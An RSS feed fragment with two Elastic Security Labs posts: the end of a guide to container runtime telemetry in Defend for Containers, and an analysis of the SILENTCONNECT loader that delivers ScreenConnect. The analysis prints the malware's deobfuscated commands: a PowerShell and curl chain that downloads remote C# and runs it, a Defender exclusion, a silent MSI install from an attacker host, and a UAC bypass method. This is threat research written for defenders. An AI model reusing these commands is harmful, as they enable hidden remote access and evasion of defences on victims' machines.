<p>Once a policy is deployed, it is critical to validate it against real workload behavior before enabling aggressive responses such as blocking. Policies that are too restrictive can disrupt normal container operations; policies that are too permissive may let unwanted activity go unnoticed.</p>
<p>A recommended workflow is:</p>
<ol>
<li>Deploy the default policy in monitoring mode (e.g., with selectors logging events).</li>
<li>Observe the events that appear in Elasticsearch to understand normal workload patterns.</li>
<li>Incrementally tighten selectors and responses, moving from <em>log only</em> → <em>alert</em> → <em>block</em>, testing at each stage.</li>
<li>Use a staging or test cluster to validate blocking behaviors before applying them in production.</li>
</ol>
<h3>Defend for Containers Beta limitations</h3>
<p>As of writing, Defend for Containers is available as a Beta integration, and its current capabilities and platform support reflect that status.</p>
<p>Defend for Containers formally supports Amazon EKS and Google GKE. While the integration can be deployed on Azure AKS, this configuration is not officially supported. In particular, AKS deployments currently lack file event telemetry, which limits detection coverage for file-based attack techniques in those environments.</p>
<p>The current Beta also does not capture network events. As a result, detections related to outbound connections, lateral network movement, or data exfiltration must rely on complementary data sources, such as the <a href="https://www.elastic.co/docs/reference/integrations/network_traffic">Network Packet Capture integration</a> or <a href="https://www.elastic.co/beats/packetbeat">Packetbeat</a> integrations, rather than on Defend for Containers telemetry alone.</p>
<p>For file activity, Defend for Containers intentionally logs file open events only when opened with write intent. This design choice reduces noise and focuses on behavior that modifies the system state. However, it also means that read-only access to sensitive files, such as secret discovery, configuration scraping, or failed access attempts, is not currently observable.</p>
<p>This limitation impacts detection use cases such as:</p>
<ul>
<li>Searching and reading Kubernetes service account tokens,</li>
<li>Scanning for <code>.env</code> files or credential material.</li>
</ul>
<p>These are areas where future Defend for Containers iterations may provide more granular telemetry to support advanced detection engineering use cases.</p>
<h3>Enabling the Defend for Containers pre-built detection rules</h3>
<p>Defend for Containers ships with a set of pre-built detection rules that provide baseline coverage for common container attack techniques. Once the integration is enabled, these rules can be activated directly from Elastic Security without additional configuration.</p>
<p>Enabling the pre-built rules is recommended as a starting point, as they are designed to align with Defend for Containers' runtime telemetry and cover execution, file modification, persistence, and post-compromise behavior inside containers. From there, the rules can be extended or refined to match environment-specific workloads and threat models.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image17.png" alt="Figure 9: Defend for Containers pre-built detection rule installation based on tag" title="Figure 9: Defend for Containers pre-built detection rule installation based on tag" /></p>
<p>By filtering for “Data Source: Elastic Defend for Containers”, you can find all rules associated with this integration.</p>
<p><strong>Note:</strong> if you do not see any rules pop up, make sure your stack is running version 9.3.0, as these rules are deployed only on 9.3.0+.</p>
<p>With all important Beta limitations mapped, the integration deployed, the pre-built detection rules installed and enabled, and a working policy in place, the next step is to explore the event semantics Defend for Containers produces, including fields commonly used in detection logic, performance considerations, and how these events differ from Elastic Defend events.</p>
<h2>Analyzing Defend for Containers events</h2>
<p>Now that Defend for Containers is deployed and policies are in place, the next step is understanding the events it generates. Similar to working with Elastic Defend or Auditd Manager, Defend for Containers telemetry becomes far more valuable once you develop a mental model of how events are structured and which fields are most relevant for detection engineering.</p>
<p>Defend for Containers produces multiple event types, most notably process events and file events, each enriched with container, host, and orchestration context. While the underlying signals remain rooted in Linux behavior, the additional Kubernetes and container metadata enable you to reason about activity in ways not possible with host-only telemetry.</p>
<p>The following sections walk through the most important field groups and event types, using real Defend for Containers events as reference points.</p>
<h3>Common fields</h3>
<p>Before diving into specific event categories, it is useful to understand the fields that consistently appear across Defend for Containers telemetry. These fields provide the contextual glue that ties individual runtime actions back to policies, selectors, and the underlying execution points inside the kernel.</p>
<p>While process and file events differ in their details, the fields described below are present across Defend for Containers data streams and are often the first place to look when validating detections or troubleshooting policy behavior.</p>
<h4>Defend for Containers-specific context</h4>
<p>Defend for Containers adds several fields specific to how events are collected and policies are applied.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image10.png" alt="Figure 10: Defend for Containers’ important cloud_defend.* fields overview" title="Figure 10: Defend for Containers’ important `cloud_defend.*` fields overview" /></p>
<p>The <code>cloud_defend.hook_point</code> field indicates where in the kernel the event was captured. In the example shown, values such as <code>tracepoint__sched_process_fork</code> and <code>tracepoint__sched_process_exec</code> reveal that the event was generated from kernel tracepoints associated with process creation and execution.</p>
<p>The <code>cloud_defend.matched_selectors</code> field shows which selectors in the active policy matched the event. In the example, the value <code>allProcesses</code> indicates that this event matched a broad selector that captures all process activity. When tuning policies or investigating alerts, this field is essential for understanding <em>why</em> an event was captured.</p>
<p>The <code>cloud_defend.package_policy_id</code> and <code>cloud_defend.package_policy_revision</code> fields tie the event back to a specific Elastic Agent policy and its revision. This makes it possible to correlate events with configuration changes over time and to verify which version of a policy was active when the event occurred.</p>
<h4>Event metadata</h4>
<p>Defend for Containers events follow the <a href="https://www.elastic.co/docs/reference/ecs">Elastic Common Schema</a> conventions and include standard event metadata that describes the activity's type and lifecycle.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image2.png" alt="Figure 11: Defend for Containers’ important event.* fields overview" title="Figure 11: Defend for Containers’ important `event.*` fields overview" /></p>
<p>The <code>event.category</code> field identifies the high-level type of activity, such as <code>process</code> or <code>file</code>, and is typically the first field used when filtering Defend for Containers data. The <code>event.action</code> field describes what occurred, for example, <code>fork</code> or <code>exec</code> for process activity, or <code>open</code>, <code>creation</code>, <code>modification</code>, and <code>deletion</code> for file events.</p>
<p>The <code>event.type</code> field adds lifecycle context, such as <code>start</code> for process execution, and is often used together with <code>event.action</code> to distinguish different phases of activity. The <code>event.dataset</code> field indicates the originating Defend for Containers data stream, such as <code>cloud_defend.process</code>, which is useful when building dataset-scoped queries or detections.</p>
<p>Additional metadata fields like <code>event.id</code>, <code>event.ingested</code>, and <code>event.kind</code> are primarily used for correlation, ordering, and troubleshooting rather than detection logic.</p>
<h4>Host information</h4>
<p>Defend for Containers events include full host context, similar to Elastic Defend and Auditd Manager. This makes it possible to correlate container runtime activity back to the underlying Kubernetes node.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image9.png" alt="Figure 12: Defend for Containers’ important host.* fields overview" title="Figure 12: Defend for Containers’ important `host.*` fields overview" /></p>
<p>The <code>host.name</code> field identifies the node on which the container is running, while <code>host.os.*</code> provides operating system details such as distribution and kernel version. The <code>host.architecture</code> field indicates the CPU architecture, which can be relevant when analyzing binary execution or kernel-specific behavior.</p>
<p>One particularly useful field is <code>host.pid_ns_ino</code>, which identifies the PID namespace. This field allows container activity to be correlated with host-level process and kernel telemetry, and is especially valuable when investigating container escape attempts or node-level impact.</p>
<p>This host context is critical when analyzing cloud-native attacks, as multiple containers often share the same host and kernel, and a container's runtime behavior can have implications beyond its boundaries.</p>
<h4>Container and orchestrator context</h4>
<p>Defend for Containers' primary strength lies in its container awareness. Every runtime event is enriched with container and orchestration metadata, allowing activity to be analyzed in the context of <em>what</em> is running, <em>where it is running</em>, and <em>with which privileges</em>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image8.png" alt="Figure 13: Defend for Containers’ important container.* fields overview" title="Figure 13: Defend for Containers’ important `container.*` fields overview" /></p>
<p>At the container level, fields such as <code>container.id</code> and <code>container.name</code> uniquely identify the running container, while <code>container.image.name</code>, <code>container.image.tag</code>, and the image hash provide visibility into the workload’s origin and version. This is especially useful for distinguishing between expected utility images and unexpected or ad hoc workloads.</p>
<p>A key field for risk assessment is <code>container.security_context.privileged</code>. This field explicitly indicates whether a container is running in privileged mode. When privileged execution is combined with other signals such as interactive shells or broad Linux capabilities, the risk profile of any detected activity increases significantly.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image3.png" alt="Figure 14: Defend for Containers’ important orchestrator.* fields overview" title="Figure 14: Defend for Containers’ important `orchestrator.*` fields overview" /></p>
<p>Defend for Containers also enriches events with orchestration context. Fields such as <code>orchestrator.cluster.name</code>, <code>orchestrator.namespace</code>, and <code>orchestrator.resource.name</code> (typically the Pod name) tie runtime behavior back to Kubernetes workloads. Labels exposed via <code>orchestrator.resource.label</code> further allow detections to incorporate workload intent and ownership.</p>
<p>For detection engineering, this context enables precise scoping of detections to:</p>
<ul>
<li>specific namespaces (for example, <code>kube-system</code>),</li>
<li>privileged or high-risk containers,</li>
<li>workloads with sensitive labels,</li>
<li>or known utility images such as <code>netshoot</code>, <code>kubectl</code>, or <code>curl</code>.</li>
</ul>
<p>This layer of enrichment allows container-aware detection logic to be expressed directly, without having to infer intent indirectly from filesystem paths, cgroups, or namespace identifiers.</p>
<h3>Process events</h3>
<p>Process execution is one of the most important signal types that Defend for Containers provides. Process events capture <code>fork</code>, <code>exec</code>, and <code>end</code> activities within containers and expose detailed lineage information critical to understanding how execution unfolds at runtime.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image12.png" alt="Figure 15: Defend for Containers’ important process.* fields overview" title="Figure 15: Defend for Containers’ important `process.*` fields overview" /></p>
<p>Several fields are particularly important for detection engineering. The combination of <code>process.name</code> and <code>process.executable</code> identifies what was executed and from where, while <code>process.args</code> provides insight into how it was invoked. Fields such as <code>process.pid</code>, <code>process.start</code>, <code>process.end</code>, and <code>process.exit_code</code> describe the process lifecycle and are useful for timing analysis and execution-flow reconstruction. The <code>process.entity_id</code> provides a stable identifier that allows processes to be tracked across multiple related events.</p>
<p>Defend for Containers also captures rich ancestry information. Fields under <code>process.parent.*</code> describe the immediate parent process, making it possible to detect suspicious parent–child relationships such as shells spawned by unexpected binaries. In addition, <code>process.entry_leader.*</code> and <code>process.session_leader.*</code> provide higher-level anchors within the process tree.</p>
<p>Much like Elastic Defend, Defend for Containers models processes as a graph rather than isolated events. The entry leader is especially useful in container environments, as it often represents the initial process launched by the container runtime (for example, <code>containerd</code>, <code>runc</code>, or a shell specified as the container entrypoint). Anchoring detections to the entry leader allows process trees to be interpreted consistently, even when containers spawn many short-lived child processes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image15.png" alt="Figure 16: Defend for Containers’ important process.session* fields overview" title="Figure 16: Defend for Containers’ important `process.session*` fields overview" /></p>
<p>Session leader fields provide additional context about interactive execution and session boundaries, helping distinguish background services from interactive or attacker-driven activity.</p>
<p>Together, these fields make it possible to express detection logic that goes beyond single executions and instead reasons about execution chains, lineage, and intent, which is essential for detecting real-world container attack techniques.</p>
<h4>Capabilities and privilege context</h4>
<p>One of the more powerful aspects of the Defend for Containers process events is the inclusion of Linux capability information. For each process, Defend for Containers exposes both the effective and permitted capability sets via:</p>
<ul>
<li><code>process.thread.capabilities.effective</code></li>
<li><code>process.thread.capabilities.permitted</code></li>
</ul>
<p>These fields describe what a process is actually allowed to do at runtime, independent of its user ID or container boundary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image14.png" alt="Figure 17: Defend for Containers’ important process.thread.capabilities.* fields overview" title="Figure 17: Defend for Containers’ important `process.thread.capabilities.*` fields overview" /></p>
<p>In privileged containers, processes often expose a broad set of effective capabilities, including highly sensitive ones such as <code>CAP_SYS_ADMIN</code>, <code>CAP_SYS_MODULE</code>, <code>CAP_SYS_PTRACE</code>, <code>CAP_SYS_RAWIO</code>, and <code>CAP_BPF</code>. The presence of these capabilities significantly changes the risk profile of any executed command, as they enable actions that can directly impact the host kernel or other workloads.</p>
<p>From a detection engineering perspective, this context is critical. It allows detections to move beyond simple process-name matching and instead reason about <em>impact</em>. The same binary execution can have vastly different implications depending on whether it runs with a minimal capability set or with near-host-level privileges.</p>
<p>In practice, capability data enables detection engineers to:</p>
<ul>
<li>Identify suspicious tooling executed inside overly permissive containers.</li>
<li>Correlate runtime behavior with dangerous capability combinations.</li>
<li>Prioritize alerts based on actual exploitation potential rather than surface-level activity.</li>
</ul>
<p>This becomes especially relevant to container breakout research, where the presence or absence of specific capabilities often determines whether an exploit is viable.</p>
<h4>Interactive execution</h4>
<p>The <code>process.interactive</code> field indicates whether a process is associated with an interactive session. In container environments, interactive execution is relatively rare for production workloads and often correlates strongly with post-compromise or hands-on-keyboard activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image4.png" alt="Figure 18: Defend for Containers’ important process.*.interactive fields overview" title="Figure 18: Defend for Containers’ important `process.*.interactive` fields overview" /></p>
<p>Defend for Containers exposes interactivity not only at the process level, but also across related execution contexts, including <code>process.parent.interactive</code>, <code>process.entry_leader.interactive</code>, and <code>process.session_leader.interactive</code>. This makes it possible to determine whether an entire execution chain is interactive, rather than relying on a single process flag in isolation.</p>
<p>Common examples of interactive execution within containers include spawning a <code>bash</code> or <code>sh</code> shell, running interactive utilities such as <code>curl</code>, <code>kubectl</code>, or <code>busybox</code>, or operator-driven reconnaissance within a compromised Pod. While these actions may be legitimate during debugging, they are uncommon in steady-state production workloads.</p>
<p>When combined with container image, namespace, and privilege context, interactive execution becomes a strong anomaly signal. It allows detection logic to distinguish between expected automated container behavior and activity more consistent with manual intervention or attacker-driven exploration.</p>
<h3>File events</h3>
<p>Defend for Containers file events capture filesystem activity inside containers, and are emitted for a variety of operations. Unlike traditional file integrity monitoring, these events are runtime-aware and scoped to container workloads, providing context about <em>how</em> and <em>why</em> file changes occur.</p>
<p>Defend for Containers can detect file activity such as file opens <strong>with write intent</strong>, content modifications, file creations, renames, permission changes, and deletions. By focusing on write-oriented operations, Defend for Containers emphasizes behavior that alters system state rather than passive file access.</p>
<p>This allows detection engineers to reason about file usage patterns at runtime, not just the result of a change.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image6.png" alt="Figure 19: Defend for Containers’ important file events overview" title="Figure 19: Defend for Containers’ important `file` events overview" /></p>
<p>Several fields are particularly important when building file-based detections. The <code>file.path</code> and <code>file.name</code> fields identify the affected file and its location, while <code>file.extension</code> can help distinguish binaries, scripts, and configuration files. The <code>event.action</code> and <code>event.type</code> fields describe what operation occurred and how it should be interpreted in the event lifecycle.</p>
<p>Together, these fields allow Defend for Containers to distinguish benign file access from suspicious modification patterns, such as writing binaries or changing permissions within sensitive directories.</p>
<h3>Bringing it together</h3>
<p>As with any other data source, Defend for Containers telemetry becomes truly valuable once you understand how to combine fields across the process, file, container, and orchestration domains. Rather than relying on static indicators, Defend for Containers enables detection engineering based on runtime behavior, privilege context, and workload identity.</p>
<h2>Conclusion</h2>
<p>Defend for Containers in Elastic Stack 9.3.0 includes container runtime detection as a core component of Linux detection engineering. It features a clear scope, a policy-driven configuration model, and runtime telemetry designed specifically for containerized workloads.</p>
<p>In this post, we examined how to deploy Defend for Containers, how its policy model is structured, and how runtime events are generated and enriched with container and orchestration context. We explored the structure of process and file events, capability metadata, interactive execution signals, and container-specific fields that allow detections to be expressed in a workload-aware manner.</p>
<p>The key takeaway is that effective container detection requires reasoning about runtime behavior in context: processes, file modifications, privileges, and workload identity must be evaluated together. Defend for Containers provides the necessary telemetry to make that possible.</p>
<p>In the next article, we will build on this foundation by walking through a realistic container attack scenario and demonstrating how Defend for Containers telemetry surfaces each stage of compromise in practice.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/getting-started-with-defend-for-containers.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect]]></title>
            <link>https://www.elastic.co/security-labs/silentconnect-delivers-screenconnect</link>
            <guid>silentconnect-delivers-screenconnect</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[SILENTCONNECT is a multi-stage loader that leverages VBScript, in-memory PowerShell execution, and PEB masquerading to silently deploy the ScreenConnect RMM tool.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs is observing malicious campaigns delivering a multi-stage infection involving a previously undocumented loader. The infection begins when users are diverted to a Cloudflare Turnstile CAPTCHA page under the guise of a digital invitation. After the link is clicked, a VBScript file is downloaded to the machine. Upon execution, the script retrieves C# source code, which is then compiled and executed in memory using PowerShell. The final payload observed in these campaigns is ScreenConnect, a remote monitoring and management (RMM) tool used to control victim machines.</p>
<p>This campaign highlights a common theme: attackers abusing living-off-the-land binaries (<a href="https://lolbas-project.github.io/">LOLBins</a>) to facilitate execution, as well as using trusted hosting providers such as Google Drive and Cloudflare. While the loader is small and straightforward, it appears to be quite effective and has remained under the radar since March 2025.</p>
<h2>Key takeaways</h2>
<ul>
<li>SILENTCONNECT is a newly discovered loader actively being used in-the-wild</li>
<li>This loader silently installs ConnectWise ScreenConnect, enabling hands-on keyboard access to victim machines</li>
<li>Campaigns distributing SILENTCONNECT use hosting infrastructure from Cloudflare and Google Drive</li>
<li>SILENTCONNECT uses NT API calls, PEB masquerading and includes Windows Defender exclusion and User Account Control (UAC) bypass</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image13.png" alt="SILENTCONNECT attack diagram" title="SILENTCONNECT attack diagram" /></p>
<h2>SILENTCONNECT infection chain</h2>
<p>In the first week of March, our team observed a living off-the-land style infection generating multiple behavioral alerts over a short period.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image12.png" alt="Elastic Defend alerts" title="Elastic Defend alerts" /></p>
<p>The initial VBScript download triggered our <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/execution_suspicious_windows_script_downloaded_from_the_internet.toml">Suspicious Windows Script Downloaded from the Internet rule</a>, which let us pivot to the source of the infection using the associated <code>file.origin_url</code> and <code>file.origin_referrer_url</code> fields.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image10.png" alt="File origin fields" title="File origin fields" /></p>
<p>By navigating to the original landing page, we observed a Cloudflare Turnstile CAPTCHA page. After clicking the human verification checkbox, a VBScript file (<code>E-INVITE.vbs</code>) is downloaded to the machine.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image19.png" alt="Cloudflare CAPTCHA page" title="Cloudflare CAPTCHA page" /></p>
<p>Below is the source code of the landing page, we can see that the VBScript file (<code>E-INVITE.vbs</code>) is hosted on Cloudflare’s object storage service <a href="https://developers.cloudflare.com/r2/"><code>r2.dev</code></a>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image8.png" alt="Landing page source code" title="Landing page source code" /></p>
<p>Below are other VBScript filenames observed in the last month related to these campaigns:</p>
<ul>
<li><code>Alaska Airlines 2026 Fleet &amp; Route Expansion Summary.vbs</code></li>
<li><code>CODE7_ZOOMCALANDER_INSTALLER_4740.vbs</code></li>
<li><code>2025Trans.vbs</code></li>
<li><code>Proposal-03-2026.vbs</code></li>
<li><code>2025Trans.vbs</code></li>
<li><code>updatv35.vbs</code></li>
</ul>
<p>The VBScripts are minimally obfuscated, using a children’s story as a decoy, and employ the <code>Replace()</code> and <code>Chr()</code> functions to hide the next stage.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image17.png" alt="Obfuscated VBScript" title="Obfuscated VBScript" /></p>
<p>This script de-obfuscates to the following command-line output:</p>
<pre><code>&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -ExecutionPolicy Bypass 
  -command &quot;&quot;New-Item -ItemType Directory -Path 'C:\Windows\Temp' -Force | Out-Null; 
  curl.exe -L 'hxxps://drive.google[.]com/uc?id=1ohZxxT-h7xWVgclB1kvpvwkF0AGWoUtq&amp;export=download' 
  -o 'C:\Windows\Temp\FileR.txt';Start-Sleep -Seconds 
  8;$source = [System.IO.File]::ReadAllText('C:\Windows\Temp\FileR.txt');Start-Sleep 
  -Seconds 1;Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $source 
  -Language CSharp; [HelloWorld]::SayHello()&quot;&quot;
</code></pre>
<p>This snippet uses PowerShell to invoke <code>curl.exe</code> to download a C# payload from Google Drive, which is then written to the disk with the file name (<code>C:\Windows\Temp\FileR.txt</code>).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image4.png" alt="cURL download via PowerShell" title="cURL download via PowerShell" /></p>
<p>The retrieved C# source code uses an obfuscation technique known as constant unfolding to conceal the byte array used for reflective in-memory execution.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image15.png" alt="C# source code downloaded from Google Drive" title="C# source code downloaded from Google Drive" /></p>
<p>Finally, the PowerShell command compiles the downloaded C# source (<code>FileR.txt</code>) at runtime using <code>Add-Type</code>, loads it into memory as a .NET assembly, and executes it via the <code>[HelloWorld]::SayHello()</code> method.</p>
<h2>SILENTCONNECT</h2>
<p>The following section covers the .NET loader family we call SILENTCONNECT. The sample is relatively small and straightforward, primarily designed to download a remote payload (ScreenConnect) and install it silently on the system.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image5.png" alt="SILENTCONNECT - DNspy namespace/class structure" title="SILENTCONNECT - DNspy namespace/class structure" /></p>
<p>After sleeping for 15 seconds, the malware allocates executable memory using the native Windows API function via <code>NtAllocateVirtualMemory</code>, assigning the region <code>PAGE_EXECUTE_READWRITE</code> permissions. SILENTCONNECT stores an embedded byte array containing the following shellcode:</p>
<pre><code>53                        ; push rbx
48 31 DB                  ; xor rbx, rbx
48 31 C0                  ; xor rax, rax
65 48 8B 1C 25 60000000   ; mov rbx, gs:[0x60]  ← PEB address (x64)
48 89 D8                  ; mov rax, rbx        ← return value
5B                        ; pop rbx
C3                        ; ret
</code></pre>
<p>This small shellcode is moved into the recently allocated memory using <code>Marshal.Copy</code>. Next, the malware executes the shellcode in order to retrieve the address of the Process Environment Block (PEB). This approach allows the malware to access process structures directly while avoiding higher-level Windows APIs that are commonly monitored or hooked by security products.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image1.png" alt="Copying shellcode into memory via NtAllocateVirtualMemory" title="Copying shellcode into memory via NtAllocateVirtualMemory" /></p>
<p>SILENTCONNECT uses NTAPIs from <code>ntdll.dll</code> (Native APIs) and <code>ole32.dll</code> (COM APIs) during the delegate setup stage, enabling the malware to invoke functions such as <code>NtWriteVirtualMemory</code> or <code>CoGetObject</code> directly from<code>.NET</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image11.png" alt="Delegate setup for NTAPI’s" title="Delegate setup for NTAPI’s" /></p>
<p><strong>PEB Masquerading</strong></p>
<p>SILENTCONNECT implements a common malware evasion technique known as PEB masquerading. All Windows processes include a kernel-maintained structure known as the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb">Process Environment Block</a> (PEB). This structure contains a linked list of loaded modules. Inside each linked list are entries that contain the module’s base address, DLL name, and full path. SILENTCONNECT goes through this structure, finding its own module, then overwrites its <code>BaseDLLName</code> and <code>FullDllName</code> to <code>winhlp32.exe</code> and <code>c:\windows\winhlp32.exe</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image20.png" alt="PEB masquerading feature" title="PEB masquerading feature" /></p>
<p>Many security tooling, including EDRs, use the PEB as a trusted source to detect suspicious activity. This technique can fool these products by using a benign name and path to hide itself.</p>
<p>Before launching the payload, the malware implements a UAC bypass using the function <code>LaunchElevatedCOMObjectUnsafe</code> with the moniker string reversed: <code>:wen!rotartsinimdA:noitavelE -&gt; Elevation:Administrator!new:</code></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image18.png" alt="COM setup using elevation moniker" title="COM setup using elevation moniker" /></p>
<p>If the malware is in an un-elevated state, it will attempt to use the UAC bypass technique via <a href="https://gist.github.com/api0cradle/d4aaef39db0d845627d819b2b6b30512">CMSTPLUA COM interface</a>. The launch parameters are stored in a character array in reverse order as a simple obfuscation technique.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image14.png" alt="Launch parameters for ScreenConnect install" title="Launch parameters for ScreenConnect install" /></p>
<p>The first part of this obfuscated command adds a Microsoft Defender exclusion for <code>.exe</code> files.</p>
<pre><code>$ConcreteDataStructure=[char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+
[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]
101;$s=[char](23+23)+[char]101+[char]120+[char]101;&amp;($ConcreteDataStructure) 
-ExclusionExtension $s -Force;
</code></pre>
<p>Below is the result of this command in Defender with the exception added:<br />
<img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image2.png" alt="SILENTCONNECT adding Microsoft Defender exception" title="SILENTCONNECT adding Microsoft Defender exception" /></p>
<p>After adding the exclusion, SILENTCONNECT creates a temporary directory (<code>C:\Temp</code>) and uses <code>curl.exe</code> to download the malicious ScreenConnect client installer into it. It then invokes <code>msiexec.exe</code> to silently install the RMM. Below is the second-half of the command-line:</p>
<pre><code>New-Item -ItemType Directory -Path 'C:\Temp' -Force | Out-Null; curl.exe -L 
 'hxxps://bumptobabeco[.]top/Bin/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest'
  -o 'C:\Temp\ScreenConnect.ClientSetup.msi'; Start-Process msiexec.exe '/i 
  C:\Temp\ScreenConnect.ClientSetup.msi'&quot;
</code></pre>
<p>Following installation, the ScreenConnect client persists as a Windows service and beacons to the adversary-controlled ScreenConnect server at <code>bumptobabeco[.]top</code> over TCP port <code>8041</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image16.png" alt="ScreenConnect Client outbound network activity" title="ScreenConnect Client outbound network activity" /></p>
<h2>SILENTCONNECT campaign</h2>
<p>The primary initial access vector for these campaigns starts from phishing emails. We identified an email sample (<code>YOU ARE INVITED.eml</code>) uploaded to VirusTotal from a campaign last year.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image21.png" alt="Phishing email - Subject “YOU ARE INVITED”" title="Phishing email - Subject “YOU ARE INVITED”" /></p>
<p>The email is sent from <code>dan@checkfirst[.]net[.]au</code> and impersonates a project proposal invitation from a fake company. The email body invites the recipient to submit a proposal by clicking a link. This link redirects the victim to attacker-controlled infrastructure <code>imansport[.]ir/download_invitee.php</code>.</p>
<p>Notably, the threat actor reused the same URI path (<code>download_invitee.php</code>) across all compromised websites to deliver the payload. This consistent naming convention represents a poor operational security (OPSEC) practice, as it provided a reliable pivot point for tracking the campaign's infrastructure and identifying additional compromised hosts through VirusTotal searches such as <code>entity:url url:download_invitee.php</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image9.png" alt="Pivot example using same URI" title="Pivot example using same URI" /></p>
<p>We also uncovered various legitimate websites that were compromised and used the same infrastructure to facilitate other fraudulent schemes. For example, one URL (<code>solpru[.]com/process/docusign[.]html</code>) hosts a page that closely mimics the DocuSign electronic signature platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image3.png" alt="" /><br />
Fake <em>DocuSign portal</em></p>
<p>This chain completely jumps SILENTCONNECT by downloading a preconfigured ScreenConnect MSI that automatically connects to the actor’s server (<code>instance-lh1907-relay.screenconnect[.]com</code>).<br />
<img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image6.png" alt="ScreenConnect config from DocuSign scheme" title="ScreenConnect config from DocuSign scheme" /></p>
<p>Another page on a different domain impersonates a Microsoft Teams page and requests that the user download a file, which leads to abuse of the Syncro RMM Agent.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image7.png" alt="Fake Microsoft Teams landing page" title="Fake Microsoft Teams landing page" /></p>
<h2>Conclusion</h2>
<p>Elastic Security Labs continues to see an uptick in RMM adoption by threat actors. As these tools are used by legitimate IT departments, they are typically overlooked and considered “trusted” in most corporate environments. Organizations must stay vigilant, auditing their environments for unauthorized RMM usage.</p>
<p>While this particular group went a step further by writing a custom loader, the majority of their infection chain leverages Windows binaries to evade detection and blend in with normal system activity. The abuse of trusted platforms such as Google Drive and Cloudflare for payload hosting and lure delivery further complicates detection, as network-based controls are unlikely to block traffic to these services outright. As threat actors continue to favor simplicity and stealth over sophistication, campaigns of this nature are likely to persist and evolve.</p>
<h3>SILENTCONNECT and MITRE ATT&amp;CK</h3>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h4>Tactics</h4>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0011">Command and Control</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0004/">Privilege Escalation</a></li>
</ul>
<h4>Techniques</h4>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1562/001/">Impair Defenses: Disable or Modify Tools</a></li>
<li><a href="https://attack.mitre.org/techniques/T1548/002/">Abuse Elevation Control Mechanism: Bypass User Account Control</a></li>
<li><a href="https://attack.mitre.org/techniques/T1219/002/">Remote Access Tools: Remote Desktop Software</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
